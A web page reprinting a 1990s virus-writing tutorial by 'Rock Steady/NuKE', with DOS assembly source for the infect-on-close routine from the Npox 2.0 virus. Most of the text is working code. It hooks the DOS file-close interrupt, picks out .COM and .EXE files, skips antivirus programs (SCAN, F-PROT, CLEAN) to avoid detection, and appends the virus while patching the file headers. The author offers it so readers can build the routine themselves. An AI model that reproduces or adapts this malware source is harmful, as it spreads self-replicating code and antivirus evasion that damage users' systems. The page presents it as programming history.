programmers resources
  http://www.intel-assembler.it/  (c)2017 intel-assembler.it   info@intel-assembler.it
 
Infection on Closing

How viruses used to spread

(by rock steady)

Have you ever wondered how viruses used to propagate? Shown here is the "onClosingFile" replication technique, i.e. hooking interrupt 21 and modifying the file-close function.



                        ****************************
                        **  Infection on Closing  **
                        **                        **
                        **  By Rock Steady/NuKE   **
                        ****************************

This routine goes out for a few people that had trouble hacking this
routine themselves... I kinda like it, it's my very OWN, no Dark Avenger
hack, it is VERY straight forward, and kinda simple... I was not going
to put this here, but since I `Promised' people and left them hanging
with `Wait for IJ#5', I guess I owed you it... huh?

Again this code comes right out of Npox 2.0, it's neat, simple, fast,
cool, and it works. Npox is your example. I heard MANY MANY complaints
with other `Virus writing guides', meaning they explained the code but
sometimes the author himself never checked if the code was good, as he
may have modified it and not tested it... or whatever reason... Anyhow

------------------
Okay once you intercepted the Int21h/ah=3Dh function you make it jump
here...

closing_file:   cmp     bx,0h                   ;Handle=0?
                je      closing_bye             ;if equal leave
                cmp     bx,4h                   ;Handle > 4
                ja      close_cont              ;if YES ,then JUMP!
closing_bye:    jmp     dword ptr cs:[int21]    ;Leave, no interest to us

The whole point of the above code is that DOS contains 5 predefined
Handles, 0 -> 4. Basically, those handles are the NULL, CON, AUX,
COMx, LPTx handles... So we surely do not need to continue once we
encounter that...

close_cont:     push    ax
                push    bx
                push    cx
                push    dx
                push    di
                push    ds
                push    es
                push    bp

Our biggest problem is how do we know if this file is a .COM or .EXE or
simply just another dumb data file? We need this info before we can
try to infect it... We do this by getting DOS's "List of Lists"; this
will give us all the INFO we need on the File Handle Number we have in BX!
And we do that like so...

                push    bx                      ;Save File Handle
                mov     ax,1220h                ;Get the Job File Table
                int     2fh                     ;(JFT)

This will give us the JFT for the CURRENT File handle in BX, which
is given thru ES:DI. Then we use this information to get the Address of
the System File Table!

                mov     ax,1216h        ;Get System File Table (List)
                mov     bl,es:[di]      ;system file table entry number
                int     2fh
                pop     bx              ;restore the Handle

                add     di,0011h
                mov     byte ptr es:[di-0fh],02h

                add     di,0017h                ;Jump to the ASCIIZ string
                cmp     word ptr es:[di],'OC'   ;Is it a .COM file?
                jne     closing_next_try        ;Next cmp...
                cmp     byte ptr es:[di+2h],'M'
                jne     pre_exit                ;Nope exit
                jmp     closing_cunt3           ;.COM file continue

closing_next_try:
                cmp     word ptr es:[di],'XE'   ;Is it a .EXE file?
                jne     pre_exit                ;No, exit
                cmp     byte ptr es:[di+2h],'E'
                jne     pre_exit                ;No, exit

If it is an .EXE file, check if it is F-PROT or SCAN. See, F-PROT when
started up opens itself, closes itself, etc... so that a dumb
virus will infect it, and then the CRC value changes and F-PROT
screams... haha... Fuck-Prot! is the name...

closing_cunt:   cmp     word ptr es:[di-8],'CS'
                jnz     closing_cunt1              ;SCAN
                cmp     word ptr es:[di-6],'NA'
                jz      pre_exit

closing_cunt1:  cmp     word ptr es:[di-8],'-F'
                jnz     closing_cunt2              ;F-PROT
                cmp     word ptr es:[di-6],'RP'
                jz      pre_exit

closing_cunt2:  cmp     word ptr es:[di-8],'LC'
                jnz     closing_cunt3
                cmp     word ptr es:[di-6],'AE'    ;CLEAN
                jnz     closing_cunt3

pre_exit:       jmp     closing_nogood

The REST is pretty much the EXACT same as `how' you'd infect a normal
file, I'll leave it for you to go thru it... The hardest part is
OVER! Only tricky part is the ending... Remember to Close the file
and then do an IRET, you don't leave control to dos, as you only needed
to close it, so do it... OR DON'T close it and return to DOS, as dos
will close it, just DON'T CLOSE IT TWICE!!!!

closing_cunt3:  mov     ax,5700h                        ;Get file Time
                call    calldos21
                mov     al,cl
                or      cl,1fh
                dec     cx                              ;60 Seconds
                xor     al,cl
                jz      closing_nogood                  ;Already infected

                push    cs
                pop     ds
                mov     word ptr ds:[old_time],cx       ;Save time
                mov     word ptr ds:[old_date],dx

                mov     ax,4200h                        ;jmp beginning of
                xor     cx,cx                           ;file...
                xor     dx,dx
                call    calldos21

                mov     ah,3fh                          ;Get first 1b byte
                mov     cx,1Bh
                mov     dx,offset buffer
                call    calldos21

                jc      closing_no_good                 ;error?
                mov     ax,4202h                        ;Jmp to the EOF
                xor     cx,cx
                xor     dx,dx
                call    calldos21

                jc      closing_no_good
                cmp     word ptr ds:[buffer],5A4Dh      ;.EXE file?
                je      closing_exe                     ;Yupe then jmp
                mov     cx,ax
                sub     cx,3h
                mov     word ptr ds:[jump_address+1],cx  ;Figure out the
                call    infect_me                        ;jmp for .com

                jc      closing_no_good
                mov     ah,40h                          ;Write it to file
                mov     dx,offset jump_address
                mov     cx,3h
                call    calldos21
closing_no_good:
                mov     cx,word ptr ds:[old_time]       ;Save file time
                mov     dx,word ptr ds:[old_date]       ;& date
                mov     ax,5701h
                call    calldos21

closing_nogood: pop     bp
                pop     es
                pop     ds
                pop     di
                pop     dx
                pop     cx
                pop     bx
                pop     ax
                jmp     dword ptr cs:[int21]

As you see the above, we DIDN'T close the file, so we leave dos to do it.
The bottom is for infecting .exes...

closing_exe:    mov     cx,word ptr cs:[buffer+20]      ;Save the original
                mov     word ptr cs:[exe_ip],cx         ;CS:IP & SS:SP
                mov     cx,word ptr cs:[buffer+22]
                mov     word ptr cs:[exe_cs],cx
                mov     cx,word ptr cs:[buffer+16]
                mov     word ptr cs:[exe_sp],cx
                mov     cx,word ptr cs:[buffer+14]
                mov     word ptr cs:[exe_ss],cx

                push    ax
                push    dx
                call    multiply
                sub     dx,word ptr cs:[buffer+8]
                mov     word ptr cs:[vir_cs],dx
                push    ax
                push    dx
                call    infect_me
                pop     dx
                pop     ax
                mov     word ptr cs:[buffer+22],dx
                mov     word ptr cs:[buffer+20],ax
                pop     dx
                pop     ax
                jc      closing_no_good

                add     ax,virus_size
                adc     dx,0

                push    ax
                push    dx
                call    multiply
                sub     dx,word ptr cs:[buffer+8]
                add     ax,40h
                mov     word ptr cs:[buffer+14],dx
                mov     word ptr cs:[buffer+16],ax
                pop     dx
                pop     ax

                push    bx
                push    cx
                mov     cl,7
                shl     dx,cl

                mov     bx,ax
                mov     cl,9
                shr     bx,cl

                add     dx,bx
                and     ax,1FFh
                jz      close_split
                inc     dx
close_split:    pop     cx
                pop     bx

                mov     word ptr cs:[buffer+2],ax
                mov     word ptr cs:[buffer+4],dx

                mov     ah,40h
                mov     dx,offset ds:[buffer]
                mov     cx,20h
                call    calldos21

closing_over:   jmp     closing_no_good

;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
;                   Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me       proc
                mov     ah,40h
                mov     dx,offset init_virus
                mov     cx,virus_size
                call    calldos21

                jc      exit_error                      ;Error Split
                mov     ax,4200h
                xor     cx,cx                           ;Pointer back to
                xor     dx,dx                           ;Top of file!
                call    calldos21

                jc      exit_error                      ;Split Dude...
                clc                                     ;Clear carry flag
                ret
exit_error:
                stc                                     ;Set carry flag
                ret
infect_me       endp





